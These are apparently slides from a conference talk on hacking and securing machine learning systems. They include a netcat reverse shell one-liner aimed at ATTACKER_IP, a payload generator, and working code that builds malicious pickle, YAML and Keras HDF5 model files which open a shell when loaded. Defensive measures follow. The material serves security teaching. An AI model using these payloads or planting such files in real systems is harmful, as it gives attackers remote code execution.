Slide 1

Slide 1 text

Hacking and Securing Machine Learning Environments and Systems Joshua Arvin Lat PyCon APAC 2022

Slide 2

Slide 2 text

➤ Chief Technology Officer of NuWorks Interactive Labs
➤ AWS Machine Learning Hero
➤ Author of 📖 Machine Learning with Amazon SageMaker Cookbook

Slide 3

Slide 3 text

Author of 📖 Machine Learning with Amazon SageMaker Cookbook: 80 proven recipes for data scientists and developers to perform machine learning experiments and deployments

Slide 4

Slide 4 text

CYBERSECURITY ATTACK CHAIN

Slide 5

Slide 5 text

JUPYTER NOTEBOOK
LIBRARIES, FRAMEWORKS, PACKAGES, AND DEPENDENCIES
CUSTOM CODE
DATASET
INFRASTRUCTURE
ML SERVICE

Slide 6

Slide 6 text

ML SERVICE
CUSTOM CODE
DOCKER CONTAINER IMAGE
INFERENCE ENDPOINT CONFIGURATION
MODEL ARTIFACTS

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

REVERSE SHELL

Slide 9

Slide 9 text

ATTACKER MACHINE:
    nc -nvl 14344

VICTIM MACHINE (MALICIOUS FILE):
    mkfifo /tmp/ABC; cat /tmp/ABC | /bin/sh -i 2>&1 | nc ATTACKER_IP 14344 > /tmp/ABC

Slide 10

Slide 10 text

PAYLOAD GENERATION

Slide 11

Slide 11 text

import random
import string

def generate_random_string():
    # Random 5-character uppercase suffix for the named pipe
    list_of_chars = random.choices(string.ascii_uppercase, k=5)
    return ''.join(list_of_chars)

def generate_payload(ip="127.0.0.1", port="14344"):
    # Build the reverse shell one-liner: named pipe -> shell -> netcat
    r = "/tmp/" + generate_random_string()
    commands = [
        f'rm {r}; mkfifo {r}; cat {r} ',
        f'/bin/sh -i 2>&1',
        f'nc {ip} {port} > {r} '
    ]
    return ' | '.join(commands)

Slide 12

Slide 12 text

import os
import pickle

PAYLOAD = generate_payload()

class SampleClass:
    def __reduce__(self):
        # __reduce__ tells pickle how to reconstruct the object;
        # here it instructs the unpickler to call os.system(PAYLOAD)
        cmd = PAYLOAD
        return os.system, (cmd,)

def generate_pickle():
    obj = SampleClass()
    with open("model.pkl", "wb") as f:
        pickle.dump(obj, f)

Slide 13

Slide 13 text

MALICIOUS PICKLE FILES

Slide 14

Slide 14 text

python -m pickletools model.pkl

    0: \x80 PROTO      3
    2: c    GLOBAL     'posix system'
   16: q    BINPUT     0
   18: X    BINUNICODE 'rm /tmp/UJTOU; mkfifo /tmp/UJTOU; cat /tmp/UJTOU | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/UJTOU'
  123: q    BINPUT     1
  125: \x85 TUPLE1
  126: q    BINPUT     2
  128: R    REDUCE
  129: q    BINPUT     3
  131: .    STOP

Slide 15

Slide 15 text

import pickle
from flask import Flask

app = Flask(__name__)

def load_model():
    model = None
    with open("model.pkl", "rb") as f:
        # pickle.load() runs the __reduce__ payload embedded in the file
        model = pickle.load(f)
    return model

@app.route("/predict", methods=["POST"])
def predict():
    model = load_model()
    # get input value from request
    # perform prediction
    return '', 200

# Other loaders that also deserialize Pickle under the hood:
import torch
torch.load("model.pkl")

import joblib
joblib.load("model.pkl")

Slide 16

Slide 16 text

Load Pickle files securely?

import builtins
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow a small whitelist of harmless builtins
        SAFE_BUILTINS = {'range', 'complex', 'set'}
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError()

with open("model.pkl", "rb") as f:
    model = RestrictedUnpickler(f).load()
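A short usage sketch to go with this (not on the slide), assuming the malicious model.pkl crafted earlier: the restricted unpickler rejects the reference to posix.system instead of executing it.

try:
    with open("model.pkl", "rb") as f:
        model = RestrictedUnpickler(f).load()
except pickle.UnpicklingError:
    # The GLOBAL opcode pointing at posix.system is rejected by find_class(),
    # so the reverse shell payload never runs.
    print("Refused to unpickle an unexpected class")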

Slide 17

Slide 17 text

MALICIOUS YAML FILES

Slide 18

Slide 18 text

import yaml
import subprocess

class Payload(object):
    def __reduce__(self):
        PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH'
        return (__import__('os').system, (PAYLOAD,))

def save_yaml():
    with open(r'malicious.yaml', 'w') as file:
        yaml.dump(Payload(), file)

Slide 19

Slide 19 text

Contents of malicious.yaml:

!!python/object/apply:posix.system
- rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH

import yaml

def load_yaml(filename):
    output = None
    with open(filename, 'r') as file:
        output = yaml.load(file, Loader=yaml.Loader)
    return output

Slide 20

Slide 20 text

Load YAML files securely?

import yaml

def safely_load_yaml(filename):
    output = None
    with open(filename, 'r') as file:
        output = yaml.safe_load(file)
    return output
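A short usage sketch (not on the slide), assuming the malicious.yaml generated earlier: safe_load() only constructs plain Python types, so the !!python/object/apply tag is rejected instead of invoking posix.system.

import yaml

try:
    with open("malicious.yaml", "r") as file:
        output = yaml.safe_load(file)
except yaml.YAMLError:
    # safe_load() refuses to construct arbitrary Python objects,
    # so the reverse shell payload never runs.
    print("Rejected unsafe YAML tag")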

Slide 21

Slide 21 text

MALICIOUS HDF5 FILES

Slide 22

Slide 22 text

from tensorflow.keras.layers import Input, Lambda, Softmax
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam

def custom_layer(tensor):
    # Runs whenever the Lambda layer is built or called, including when
    # the saved model is loaded and the graph is reconstructed
    PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH'
    __import__('os').system(PAYLOAD)
    return tensor

input_layer = Input(shape=(10,), name="input_layer")
lambda_layer = Lambda(custom_layer, name="lambda_layer")(input_layer)
output_layer = Softmax(name="output_layer")(lambda_layer)

model = Model(input_layer, output_layer, name="model")
model.compile(optimizer=Adam(lr=0.0004), loss="categorical_crossentropy")
model.save("model.h5")

Slide 23

Slide 23 text

from tensorflow.keras.models import load_model

# model.h5 is the MALICIOUS FILE crafted on the previous slide
load_model("model.h5")
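One possible pre-load check (a sketch, not from the slides; the attribute layout is an assumption about the Keras HDF5 format): inspect the serialized architecture for Lambda layers before ever calling load_model().

import json
import h5py

def has_lambda_layer(path):
    # Keras HDF5 files typically keep the architecture as JSON in the
    # 'model_config' attribute of the file root (assumption for this sketch).
    with h5py.File(path, "r") as f:
        config = f.attrs.get("model_config")
    if config is None:
        return True  # nothing to inspect; treat as unsafe
    if isinstance(config, bytes):
        config = config.decode("utf-8")
    layers = json.loads(config)["config"]["layers"]
    return any(layer.get("class_name") == "Lambda" for layer in layers)

if has_lambda_layer("model.h5"):
    raise ValueError("Refusing to load a model that contains Lambda layers")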

Slide 24

Slide 24 text

NETWORK ISOLATION

Slide 25

Slide 25 text

ATTACKER MACHINE:
    nc -nvl 14344

VICTIM MACHINE (MALICIOUS FILE)
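One way to enforce this on SageMaker (a sketch, not from the slides; the image URI and role ARN are placeholders): enable_network_isolation blocks outbound network calls from the container, so the netcat connection back to the attacker's listener cannot be established even if the payload runs.

from sagemaker.estimator import Estimator

estimator = Estimator(
    image_uri="<ECR_IMAGE_URI>",               # placeholder
    role="<SAGEMAKER_EXECUTION_ROLE_ARN>",     # placeholder
    instance_count=1,
    instance_type="ml.m5.xlarge",
    enable_network_isolation=True,             # container gets no outbound network access
)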

Slide 26

Slide 26 text

PRIVILEGE ESCALATION

Slide 27

Slide 27 text

IAM USER
IAM ROLE
NOTEBOOK INSTANCE
PERMITTED TO ACCESS?
PERMITTED TO ACCESS OR PERFORM THE FOLLOWING ACTIONS

from sagemaker import get_execution_role
role = get_execution_role()
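A minimal sketch of why this matters (not from the slides): code running inside a compromised notebook instance inherits whatever the attached execution role is allowed to do, so the attacker can simply call AWS APIs with it.

import boto3

# The notebook's credentials come from the attached IAM role.
print(boto3.client("sts").get_caller_identity())

# If the role is overly permissive, enumerating (and reading) every
# S3 bucket in the account works without any further exploitation.
for bucket in boto3.client("s3").list_buckets()["Buckets"]:
    print(bucket["Name"])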

Slide 28

Slide 28 text

PRINCIPLE OF LEAST PRIVILEGE
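A hedged sketch of scoping that execution role down (role name, policy name, and bucket ARN are placeholders): grant only the specific actions and resources the notebook actually needs.

import json
import boto3

policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject"],
        "Resource": ["arn:aws:s3:::example-training-data/*"],   # placeholder bucket
    }],
}

# Attach the narrow inline policy to the notebook's execution role (placeholder names).
boto3.client("iam").put_role_policy(
    RoleName="ExampleNotebookExecutionRole",
    PolicyName="LeastPrivilegeS3Read",
    PolicyDocument=json.dumps(policy),
)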

Slide 29

Slide 29 text

ATTACKS ON DATA PRIVACY & MODEL PRIVACY

Slide 30

Slide 30 text

ATTACKS ON DATA PRIVACY & MODEL PRIVACY

Model inversion attack
Model extraction attack
Membership inference attack
Attribute inference attack
De-anonymization
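To make one of these concrete, a minimal membership inference sketch (illustrative only, not from the slides): an overfit model tends to be more confident on records it was trained on, so thresholding the top predicted probability leaks membership.

from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=2000, n_features=20, random_state=0)
X_member, X_nonmember, y_member, y_nonmember = train_test_split(
    X, y, test_size=0.5, random_state=0)

# An overfit target model is more confident on its own training records.
target = RandomForestClassifier(n_estimators=50, random_state=0)
target.fit(X_member, y_member)

def guess_membership(samples, threshold=0.9):
    # Guess "member" whenever the top predicted probability is very high.
    return target.predict_proba(samples).max(axis=1) >= threshold

print("flagged as members (true members):    ", guess_membership(X_member).mean())
print("flagged as members (true non-members):", guess_membership(X_nonmember).mean())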

Slide 31

Slide 31 text

ACCOUNT ACTION MONITORING
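A small sketch of what this can look like with CloudTrail via boto3 (the event name filter is just an example): review who recently generated presigned notebook URLs.

import boto3

cloudtrail = boto3.client("cloudtrail")

# Example filter only: recent presigned-notebook-URL events.
response = cloudtrail.lookup_events(
    LookupAttributes=[{
        "AttributeKey": "EventName",
        "AttributeValue": "CreatePresignedNotebookInstanceUrl",
    }],
    MaxResults=50,
)

for event in response["Events"]:
    print(event["EventTime"], event["EventName"], event.get("Username"))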

Slide 32

Slide 32 text

LAMBDA + SCIKIT-LEARN PREDICTION ENDPOINT, API GATEWAY
LAMBDA + TENSORFLOW PREDICTION ENDPOINT, API GATEWAY
LAMBDA + FB PROPHET PREDICTION ENDPOINT, API GATEWAY
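A minimal sketch of one of these serverless endpoints (the model path and request format are assumptions): an API Gateway-backed Lambda handler that loads a pre-trained scikit-learn model with joblib and returns a prediction.

import json
import joblib

# Loaded once per Lambda container, outside the handler
# (the model path is an assumption for this sketch).
model = joblib.load("/opt/ml/model.joblib")

def handler(event, context):
    # API Gateway proxy integration passes the request body as a JSON string.
    body = json.loads(event["body"])
    prediction = model.predict([body["features"]])
    return {
        "statusCode": 200,
        "body": json.dumps({"prediction": prediction.tolist()}),
    }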

Slide 33

Slide 33 text

AUTOMATED VULNERABILITY MANAGEMENT

Slide 34

Slide 34 text

VULNERABILITY ASSESSMENT TOOL
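One hedged example of pulling automated scan results into such a workflow, assuming the inference container images live in Amazon ECR with image scanning enabled (repository name and tag are placeholders):

import boto3

ecr = boto3.client("ecr")

# Repository name and tag are placeholders for this sketch.
response = ecr.describe_image_scan_findings(
    repositoryName="ml-inference-endpoint",
    imageId={"imageTag": "latest"},
)

for finding in response["imageScanFindings"]["findings"]:
    print(finding["severity"], finding["name"])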

Slide 35

Slide 35 text

Thanks